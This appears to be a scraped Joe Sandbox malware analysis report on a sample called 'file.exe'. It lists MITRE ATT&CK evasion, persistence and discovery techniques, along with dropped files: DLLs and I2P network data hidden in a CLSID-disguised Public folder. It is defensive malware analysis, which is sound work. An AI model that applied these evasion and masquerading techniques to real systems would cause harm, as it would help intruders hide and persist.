Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
API String ID: 1001908780-1337547089
Opcode ID: 5dd7998d9f00c0f7fd5a7dcc71336826af2e178b8040c12a793cad92f1755f65
Instruction ID: d00034443094647557f60db136cdc5feec0ce07946002ad2c8e3068fc16bae19
Opcode Fuzzy Hash: 5dd7998d9f00c0f7fd5a7dcc71336826af2e178b8040c12a793cad92f1755f65
Instruction Fuzzy Hash: A3E01251A0CD4A89F5109B06FC101792255FF617A8F5002B5E96E669B19D2CD5C69308

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Tactics:	Persistence
Data Sources:	Command: Command Execution, Process: Process Creation, User Account: User Account Creation
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use hidden users to hide the presence of user accounts they create or modify. Administrators may want to hide users when there are many user accounts on a given system or if they want to hide their administrative or other management accounts from other users.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, User Account: User Account Creation, User Account: User Account Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
Tactics:	Credential Access, Discovery
Data Sources:	Command: Command Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\95cRhCj4pPDP.acl

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\config.ini

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dll

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.log

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p.conf

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p.su3

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\destinations\4ojubzprlqkwtppa7wo3n2u5z6prjz6km4do2cmqez5fw7mh4jsa.dat

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\destinations\5sab7p7e7ioxe2l4gkejqh66ebcur4vug3hbtegsmhp3fhfckuaq.dat

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\destinations\ldeorbjrydtdfhlgnxmago242ueojdmzslwisulw5wyezob5laqq.dat

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\destinations\v7rlxdz7rj66ttnlyxpxrn6afzmj6ee72ra5jpc55qkerx6ksfkq.dat

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\r-\routerInfo--hXYrwghVUpdw145IaYc0-a0Vql2i9EpLdVhlBJbCfQ=.dat

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\r0\routerInfo-0PH5PjnlqWun0c9z33SXdQAOjtJrS95tjibe0VlgqHc=.dat

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\r0\routerInfo-0ftt1JFJ5xa4ViHJ3qNC9jzj9r5pBxER6r95a7wwF~0=.dat

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\r0\routerInfo-0lvM-~59jimcPy41DlLr1sHENdeuG3NutoJ-RV~ktAU=.dat

Windows Analysis Report
file.exe

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as `sc query` , `tasklist /svc` , `systemctl --type=service` , and `net start` .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre